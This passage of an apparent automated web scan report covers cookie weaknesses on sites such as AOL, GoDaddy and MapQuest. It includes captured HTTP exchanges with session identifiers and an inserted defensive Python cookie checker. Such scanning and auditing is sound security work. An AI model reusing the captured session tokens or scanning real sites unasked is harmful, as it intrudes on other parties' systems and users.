The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:48 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:48 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 108838


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...

10.118. http://www.truveo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
  • queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=univ_ent; showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l7a2hsj410v4vqu1e6743unjl4; path=/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 83513

<!DOCTYPE HTML>
<html class="no-js">
<head>
<title>Truveo Video Search</title>
<script type="text/javascript">
<!--
SpriteImg = new Image();
SpriteImg.src = "http://www.truveo.com/client/versions/uni
...[SNIP]...

10.119. http://www.truveo.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
  • ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
  • unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
  • queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 00:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: showAdult=0; expires=Sat, 04-Jun-2011 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
Set-Cookie: PHPSESSID=q63egmjqep6m7rjtv5e7epons1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.truveo.com/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 105095

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link title="Truveo Video Search" type="application/opensearchdescription+xml" rel
...[SNIP]...

11. Cookie without HttpOnly flag set
There are 98 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
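The checker below is an added example, not part of this report or of the scanner that produced it. It parses raw Set-Cookie header values like the ones captured above and reproduces the two checks behind sections 10 and 11 (Domain scoped to a parent of the issuing host; HttpOnly missing), adds a Secure-flag check for cookies set over HTTPS (a check this section does not show), marks probable session tokens with a name heuristic, and skips deletion cookies (an Expires in the past, as in the "wd=deleted" lines), which the report lists as findings even though they set nothing. The scan time, the issue identifiers and the session-name heuristic are assumptions; the sample headers are copied from responses in this section.

```python
"""Cookie attribute checker for raw Set-Cookie headers. Added example, not part of
the scan report: it reproduces the checks behind sections 10 and 11 (cookie scoped
to a parent domain; cookie without HttpOnly), adds a Secure-flag check for cookies
set over HTTPS, and skips deletion cookies, which the report lists as findings."""
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import List, Optional, Tuple

# Fixed "now" so expiry comparisons are reproducible: the report's scan time, in UTC.
SCAN_TIME = datetime(2011, 5, 5, 18, 9, 24, tzinfo=timezone.utc)
# Name heuristic for "probably a session token" (assumption: a hint, not proof,
# which is also how the report words it: "appears to contain a session token").
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth|login", re.IGNORECASE)
Finding = Tuple[str, str, bool]  # (issue id, cookie name, looks like a session token)


@dataclass
class Cookie:
    name: str
    value: str
    domain: Optional[str] = None  # None means a host-only cookie
    expires: Optional[datetime] = None
    secure: bool = False
    httponly: bool = False


def parse_set_cookie(header: str) -> Cookie:
    """Split one Set-Cookie header value into name, value and attributes. Only the
    first '=' separates name from value, so a value such as 'RV=:ED=us' (the SC
    cookie from Google Finance above) survives intact."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    c = Cookie(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        k, _, v = attr.partition("=")
        k, v = k.strip().lower(), v.strip()
        if k == "domain":
            c.domain = v.lower()
        elif k == "expires":
            try:
                exp = parsedate_to_datetime(v)  # accepts RFC 850 '01-Jan-1970' dates
            except (TypeError, ValueError):
                exp = None  # unparseable Expires: treat as a session cookie
            if exp is not None and exp.tzinfo is None:
                exp = exp.replace(tzinfo=timezone.utc)
            c.expires = exp
        elif k == "secure":
            c.secure = True
        elif k == "httponly":
            c.httponly = True
    return c


def is_deletion(c: Cookie, now: datetime) -> bool:
    """An Expires already in the past removes the cookie instead of setting one
    (the 'wd=deleted; expires=...1970' lines above), so its flags are irrelevant."""
    return c.expires is not None and c.expires <= now


def scoped_to_parent(c: Cookie, host: str) -> bool:
    """True when Domain= names a parent of the issuing host (www.facebook.com with
    Domain=.facebook.com): every subdomain then receives the cookie, which widens
    both who can read it and who can overwrite it."""
    if not c.domain:
        return False
    parent = c.domain.lstrip(".")
    host = host.lower()
    return parent != host and host.endswith("." + parent)


def check(header: str, host: str, https: bool, now: datetime = SCAN_TIME) -> List[Finding]:
    c = parse_set_cookie(header)
    if is_deletion(c, now):
        return []
    session = bool(SESSION_NAME_RE.search(c.name)) and len(c.value) >= 16
    findings: List[Finding] = []
    if not c.httponly:
        findings.append(("cookie-without-httponly", c.name, session))
    if https and not c.secure:
        findings.append(("cookie-without-secure", c.name, session))
    if scoped_to_parent(c, host):
        findings.append(("cookie-scoped-to-parent-domain", c.name, session))
    return findings


# Sample input copied from responses in this report: (host, set over HTTPS?, header).
SAMPLES = [
    ("www.aol.com", False, "JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol"),
    ("www.facebook.com", True, "wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly"),
    ("www.facebook.com", True, "reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com"),
    ("www.godaddy.com", True, "ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/"),
    ("www.godaddy.com", True, "ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly"),
]


def scan(samples=SAMPLES, now: datetime = SCAN_TIME) -> List[Finding]:
    return [f for host, https, header in samples for f in check(header, host, https, now)]


if __name__ == "__main__":
    for issue, name, session in scan():
        print(f"{issue:32} {name:24} session-token={'yes' if session else 'no'}")
```

Run it directly to print the findings for the embedded samples, or call check(header, host, https) on any Set-Cookie value pulled from a proxy log. Note that the two GoDaddy session cookies come out with complementary gaps: the classic ASP one has Secure but not HttpOnly, the ASP.NET one has HttpOnly but not Secure, and the deletion cookies that section 10 reports produce no findings at all.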



11.1. http://www.aol.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
  • tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/
The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1303579081524-New%7C1366651081524%3B%20s_nrgvo%3DNew%7C1366651081525%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-43.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/
Content-Length: 63392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...

11.2. http://www.aol.com/ajax.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 1138
Set-Cookie: JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol
Content-Length: 1138

<div id="local-module" class="mnid-local plid-60329">
<div id="localheader">

<h2><a href="http://www.aolnews.com/" class="lnid-sec1_lnk1"
name="om_local_title" target='_blank' >Local News
...[SNIP]...

11.3. http://www.crunchboard.com/opening/detailjob.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.crunchboard.com
Path:   /opening/detailjob.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
  • job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/
The PHPSESSID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /opening/detailjob.php HTTP/1.1
Host: www.crunchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 11:10:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/
Location: ./index.php
Vary: Accept-Encoding,User-Agent
Content-Length: 6901
Connection: close
Content-Type: text/html; charset=UTF-8

<script language="javascript" type="text/javascript">
   
   function hidestatus(URL)
   {
   /*var local= /http:|crunchboard.com/;
   var match = URL.search( local );
   if( match == -1 )
   {
   URL='http://tcbiz.p
...[SNIP]...

11.4. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

11.5. https://www.fightmagazine.com/mma-magazine/subscribe.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.fightmagazine.com
Path:   /mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

11.6. https://www.godaddy.com/gdshop/catalog.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/catalog.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=BJIOEHOAIADKADEGPIHAAKME; secure; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/catalog.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:20 GMT
Location: /catalog.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQETSARRC=BJIOEHOAIADKADEGPIHAAKME; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:20 GMT
Connection: close


11.7. https://www.godaddy.com/gdshop/hosting/landing.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
  • traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
The ASPSESSIONIDQETSARRC cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

11.8. https://www.godaddy.com/gdshop/registrar/search.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The ASPSESSIONIDQETSARRC cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close


11.9. https://www.godaddy.com/gdshop/website.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The ASPSESSIONIDQETSARRC cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close


11.10. http://www.mapquest.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
  • psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
  • t_Id=ZGVmYXVsdDpudWxs; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
The tsession and psession cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
